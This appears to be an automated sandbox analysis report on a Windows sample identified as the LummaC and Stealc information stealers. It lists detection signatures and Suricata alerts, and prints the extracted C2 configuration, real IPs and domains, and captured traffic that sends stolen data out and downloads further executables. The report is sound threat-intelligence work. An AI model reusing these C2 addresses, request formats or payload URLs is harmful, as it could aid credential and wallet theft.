Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1552250
MD5:	7ac86c152bac1fb0212a7ff9087a26e4
SHA1:	97b164dc69af36443b6e49173f2ce406e74d1c00
SHA256:	15b6ba95ac1a5a5f782d888d427ab68983920cd39196012e148b1d3d75166651
Tags:	exeuser-Bitsight
Infos:

Detection

LummaC, Stealc

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected Stealc

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

LummaC encrypted strings found

Machine Learning detection for sample

PE file contains section with special chars

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Detected potential crypto function

Downloads executable code via HTTP

Entry point lies outside standard sections

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 7508 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 7AC86C152BAC1FB0212A7FF9087A26E4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}

Threatname: LummaC

{"C2 url": ["necklacedmny.store", "crisiwarny.store", "fadehairucw.store", "founpiuer.store", "navygenerayk.store", "presticitpo.store", "thumbystriw.store", "scriptyprefej.store"], "Build id": "4SD0y4--legendaryy"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1627798849.00000000064B1000.00000040.00000800.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000003.1564217264.00000000088F0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: file.exe PID: 7508	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 7508	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 7508	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: file.exe PID: 7508	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.file.exe.64b0000.2.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-08T15:20:51.076431+0100	2022930	1	A Network Trojan was detected	4.175.87.197	443	192.168.2.9	49799	TCP
2024-11-08T15:21:29.033414+0100	2022930	1	A Network Trojan was detected	4.175.87.197	443	192.168.2.9	49983	TCP

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-08T15:20:36.332997+0100	2028371	3	Unknown Traffic	192.168.2.9	49726	188.114.97.3	443	TCP
2024-11-08T15:20:37.571063+0100	2028371	3	Unknown Traffic	192.168.2.9	49733	188.114.97.3	443	TCP
2024-11-08T15:20:38.899112+0100	2028371	3	Unknown Traffic	192.168.2.9	49741	188.114.97.3	443	TCP
2024-11-08T15:20:40.600455+0100	2028371	3	Unknown Traffic	192.168.2.9	49750	188.114.97.3	443	TCP
2024-11-08T15:20:42.745917+0100	2028371	3	Unknown Traffic	192.168.2.9	49762	188.114.97.3	443	TCP
2024-11-08T15:20:44.775678+0100	2028371	3	Unknown Traffic	192.168.2.9	49771	188.114.97.3	443	TCP
2024-11-08T15:20:46.436950+0100	2028371	3	Unknown Traffic	192.168.2.9	49782	188.114.97.3	443	TCP
2024-11-08T15:20:49.110287+0100	2028371	3	Unknown Traffic	192.168.2.9	49793	188.114.97.3	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-08T15:20:36.904002+0100	2054653	1	A Network Trojan was detected	192.168.2.9	49726	188.114.97.3	443	TCP
2024-11-08T15:20:38.073012+0100	2054653	1	A Network Trojan was detected	192.168.2.9	49733	188.114.97.3	443	TCP
2024-11-08T15:20:49.632362+0100	2054653	1	A Network Trojan was detected	192.168.2.9	49793	188.114.97.3	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-08T15:20:36.904002+0100	2049836	1	A Network Trojan was detected	192.168.2.9	49726	188.114.97.3	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-08T15:20:38.073012+0100	2049812	1	A Network Trojan was detected	192.168.2.9	49733	188.114.97.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (navygenerayk .store in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-08T15:20:36.332997+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.9	49726	188.114.97.3	443	TCP
2024-11-08T15:20:37.571063+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.9	49733	188.114.97.3	443	TCP
2024-11-08T15:20:38.899112+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.9	49741	188.114.97.3	443	TCP
2024-11-08T15:20:40.600455+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.9	49750	188.114.97.3	443	TCP
2024-11-08T15:20:42.745917+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.9	49762	188.114.97.3	443	TCP
2024-11-08T15:20:44.775678+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.9	49771	188.114.97.3	443	TCP
2024-11-08T15:20:46.436950+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.9	49782	188.114.97.3	443	TCP
2024-11-08T15:20:49.110287+0100	2057120	1	Domain Observed Used for C2 Detected	192.168.2.9	49793	188.114.97.3	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-08T15:20:35.423925+0100	2057129	1	Domain Observed Used for C2 Detected	192.168.2.9	62739	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-08T15:20:35.455933+0100	2057127	1	Domain Observed Used for C2 Detected	192.168.2.9	52384	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-08T15:20:35.530445+0100	2057121	1	Domain Observed Used for C2 Detected	192.168.2.9	49464	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (navygenerayk .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-08T15:20:35.553917+0100	2057119	1	Domain Observed Used for C2 Detected	192.168.2.9	53505	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-08T15:20:35.505179+0100	2057123	1	Domain Observed Used for C2 Detected	192.168.2.9	59057	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-08T15:20:35.396251+0100	2057131	1	Domain Observed Used for C2 Detected	192.168.2.9	58084	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-08T15:20:35.480837+0100	2057125	1	Domain Observed Used for C2 Detected	192.168.2.9	61606	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-08T15:20:41.207370+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.9	49750	188.114.97.3	443	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-08T15:20:58.927778+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.9	49844	185.215.113.206	80	TCP

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-08T15:20:46.442927+0100	2843864	1	A Network Trojan was detected	192.168.2.9	49782	188.114.97.3	443	TCP

HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 08 Nov 2024 14:20:50 GMTContent-Type: application/octet-streamContent-Length: 2125312Last-Modified: Fri, 08 Nov 2024 14:04:33 GMTConnection: keep-aliveETag: "672e1a71-206e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b 7d e6 03 f5 2e e6 03 f5 2e e6 03 f5 2e 89 75 5e 2e fe 03 f5 2e 89 75 6b 2e eb 03 f5 2e 89 75 5f 2e dc 03 f5 2e ef 7b 76 2e e5 03 f5 2e 66 7a f4 2f e4 03 f5 2e ef 7b 66 2e e1 03 f5 2e e6 03 f4 2e 89 03 f5 2e 89 75 5a 2e f4 03 f5 2e 89 75 68 2e e7 03 f5 2e 52 69 63 68 e6 03 f5 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 38 6e 1e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 d0 01 00 00 dc 2c 00 00 00 00 00 00 60 72 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 90 72 00 00 04 00 00 fe ec 20 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 90 2e 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 91 2e 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 2e 00 00 10 00 00 00 76 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 80 2e 00 00 00 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 2e 00 00 02 00 00 00 86 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 f0 29 00 00 a0 2e 00 00 02 00 00 00 88 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 69 6b 6d 75 67 78 77 00 c0 19 00 00 90 58 00 00 be 19 00 00 8a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6d 75 63 70 73 66 6f 6c 00 10 00 00 00 50 72 00 00 04 00 00 00 48 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 60 72 00 00 22 00 00 00 4c 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDBGHIDGDGHCBGDGCBFIHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 42 47 48 49 44 47 44 47 48 43 42 47 44 47 43 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 30 45 45 45 44 43 35 33 31 32 36 33 30 35 30 34 35 37 33 35 38 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 48 49 44 47 44 47 48 43 42 47 44 47 43 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 48 49 44 47 44 47 48 43 42 47 44 47 43 42 46 49 2d 2d 0d 0a Data Ascii: ------HDBGHIDGDGHCBGDGCBFIContent-Disposition: form-data; name="hwid"40EEEDC531263050457358------HDBGHIDGDGHCBGDGCBFIContent-Disposition: form-data; name="build"tale------HDBGHIDGDGHCBGDGCBFI--

Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 185.215.113.206 185.215.113.206

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49771 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49733 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49762 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49793 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49750 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49782 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49726 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49741 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.9:49799
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.9:49983

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: navygenerayk.store
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: navygenerayk.store
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12850Host: navygenerayk.store
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15068Host: navygenerayk.store
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20584Host: navygenerayk.store
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1238Host: navygenerayk.store
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 583761Host: navygenerayk.store
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: navygenerayk.store
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16

Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: presticitpo.store
Source: global traffic	DNS traffic detected: DNS query: crisiwarny.store
Source: global traffic	DNS traffic detected: DNS query: fadehairucw.store
Source: global traffic	DNS traffic detected: DNS query: thumbystriw.store
Source: global traffic	DNS traffic detected: DNS query: necklacedmny.store
Source: global traffic	DNS traffic detected: DNS query: founpiuer.store
Source: global traffic	DNS traffic detected: DNS query: navygenerayk.store

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: navygenerayk.store

Source: file.exe, 00000000.00000003.1557773005.00000000013FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/
Source: file.exe, 00000000.00000003.1557773005.00000000013FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Tk
Source: file.exe, 00000000.00000003.1557773005.00000000013FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/ekT
Source: file.exe, 00000000.00000002.1625467366.00000000013B9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1557773005.00000000013FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exe
Source: file.exe, 00000000.00000003.1557773005.00000000013FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exeC
Source: file.exe, 00000000.00000002.1625467366.00000000013B9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1557773005.00000000013FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/def.exee
